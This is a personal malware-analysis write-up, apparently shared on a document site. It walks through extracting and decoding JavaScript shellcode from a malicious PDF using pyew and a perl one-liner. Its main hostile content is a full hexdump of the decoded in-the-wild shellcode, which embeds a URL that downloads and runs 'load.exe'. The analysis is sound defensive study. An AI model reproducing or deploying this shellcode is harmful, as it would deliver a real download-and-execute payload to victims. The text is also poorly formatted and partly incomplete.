Using libemu to create malware flow graph
Muhammad Najmi Ahmad Zabidi
najmi.zabidi@gmail.com
∗
Abstract
In this paper basically I just document my personal experience, thatis the process of extracting shellcodes from PDF malware and later put itinto Graphviz’s picture. I adapt most the examples are from the tutorialgiven by [Jeremy, 2008].
1 Introduction
In this write up I will show to you on how to extract shellcodes from PDF files.
2 PDF malware
Malicious PDF contains embedded Javascript (*.js). This Javascript may doesharmful activity without the user’s consent.
3 Steps to extract shellcodes
3.1 Tools of trade
What we need to do basically use the existing tool. As of now I suggest you todownload the following tools:
•
•
•
3.2 Extracting the shellcode
I used pdf example.py from the pyew package.
§ ¤
$ ls pdf_example.py -l-rwxr-xr-x 1 najmi najmi 1497 2010-03-30 20:03 pdf_example.py
¦ ¥
Given that I have a PDF malware fetched from the wild:
∗
Thanks to my wife, for providing hot coffee!
1
§ ¤
$ avgscan bc66fd9e0c2f7a79167dab16531c28f2AVG command line Anti-Virus scannerCopyright (c) 2009 AVG Technologies CZVirus database version: 271.1.1/2834Virus database release date: Sun, 25 Apr 2010 14:31:00 +08:00bc66fd9e0c2f7a79167dab16531c28f2 Virus found Script/ExploitFiles scanned : 1(1)Infections found : 1(1)PUPs found : 0Files healed : 0Warnings reported : 0Errors reported : 0
¦ ¥
By using the said tool in Section3.1above, I manually took the intendedgarbled shellcodes, which contains the following shellcodes:
Figure 1:
PDF shellcodes in Pyew tool
Now let us see the strings. Take out the following strings in between the
unescape()
brakets, and save it somewhere in a texeditor.2
Figure 2:
PDF shellcodes (Zoom mode)
Now, we need to filter out the unintended strings, simply cut out using thefollowing perl script:
cat shell.txt | perl -pe ’s/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge’ > filtered -shell.txt
Now, you should get the intended shellcodes. You actually can see a plainURL within that PDF shellcodes. Say, by using hexdump tool:
$hexdump -C filtered -shell.txt00000000 90 90 90 90 90 90 eb 0f 5b 33 c9 66 b9 80 01 80 |........[3.f....|00000010 33 11 43 e2 fa eb 05 e8 ec ff ff ff 81 75 b0 21 |3.C..........u.!|00000020 11 11 11 9a 51 1d 9a 61 0d bc 9a 61 19 90 fd 11 |....Q..a...a....|00000030 15 11 11 9a fd 47 79 9f 5f 1f fd f9 ef 11 11 11 |.....Gy._.......|00000040 98 54 15 47 79 89 ef 9b 1f f9 e1 11 11 11 98 54 |.T.Gy..........T|00000050 19 47 79 34 a1 ee d3 f9 f3 11 11 11 98 54 1d 47 |.Gy4.........T.G|00000060 79 fe df f1 71 f9 c5 11 11 11 98 54 01 47 79 d0 |y...q......T.Gy.|00000070 68 f4 a9 f9 d7 11 11 11 98 54 05 51 91 29 d2 64 |h........T.Q.).d|00000080 eb 98 54 09 f8 16 10 11 11 4f 98 64 35 9a 54 15 |..T......O.d5.T.|00000090 7b 10 48 9a 44 09 47 f9 9a 11 11 11 41 79 27 0b |{.H.D.G.....Ay’.|000000a0 3e 61 f9 86 11 11 11 98 54 0d 9a d4 92 d1 41 98 |>a......T.....A.|000000b0 54 31 79 ee 11 11 11 41 9a 54 05 7b 13 48 9a 44 |T1y....A.T.{.H.D|000000c0 09 f9 70 11 11 11 12 54 31 d6 11 4d 6f 3f 74 d6 |..p....T1..Mo?t.|000000d0 51 15 69 74 11 11 ee 64 31 9a 54 1d 7b 10 48 9a |Q.it...d1.T.{.H.|000000e0 44 09 f9 51 11 11 11 7b 16 49 12 54 35 22 ca 42 |D..Q...{.I.T5".B|000000f0 42 ee 64 31 41 42 9a 54 0d 7b 14 48 9a 44 09 f9 |B.d1AB.T.{.H.D..|00000100 32 11 11 11 7b 11 ee 64 31 9a 54 19 7b 13 48 9a |2...{..d1.T.{.H.|00000110 44 09 f9 01 11 11 11 7b ee 9a 54 01 7b 10 48 9a |D......{..T.{.H.|00000120 44 09 f9 11 11 11 11 50 4a 43 12 f0 12 f0 12 f0 |D......PJC......|00000130 12 f0 92 fd 15 4b 42 9a cb f3 e6 43 ee f1 44 9a |.....KB....C..D.|00000140 fd 9a 6c 19 9a 4c 1d 47 9a 62 2d 9a 65 0f 69 12 |..l..L.G.b-.e.i.|00000150 e2 47 9a 67 31 12 e2 22 d8 58 50 bc 12 d2 47 22 |.G.g1..".XP...G"|00000160 e7 1e af 01 2b e3 65 19 d0 df 1c 12 e3 51 fa e0 |....+.e......Q..|00000170 2a ef 4f 64 f4 4b 9a fa 9a 4b 35 12 cc 77 9a 1d |*.Od.K...K5..w..|00000180 5a 9a 4b 0d 12 cc 9a 15 9a 12 d4 4f 4c d3 19 11 |Z.K........OL...|00000190 f9 e5 ef ee ee 44 43 5d 5c 5e 5f 11 68 74 74 70 |.....DC]\^_.http|000001a0 3a 2f 2f 62 75 74 65 72 69 6b 2e 63 6f 6d 2f 31 |://buterik.com/1|000001b0 32 33 2f 6c 6f 61 64 2e 65 78 65 00 0a |23/load.exe..|
3
Search History:
Result 00 of 00
00 results for result for
p.
Libemu and extracting shellcodes from PDF malware
Libemu and extracting shellcodes from PDF malware, Graphviz
5.1K
Reads
17
Readcasts
1
Embed Views
Recommended
More From This User
Notes
Load more
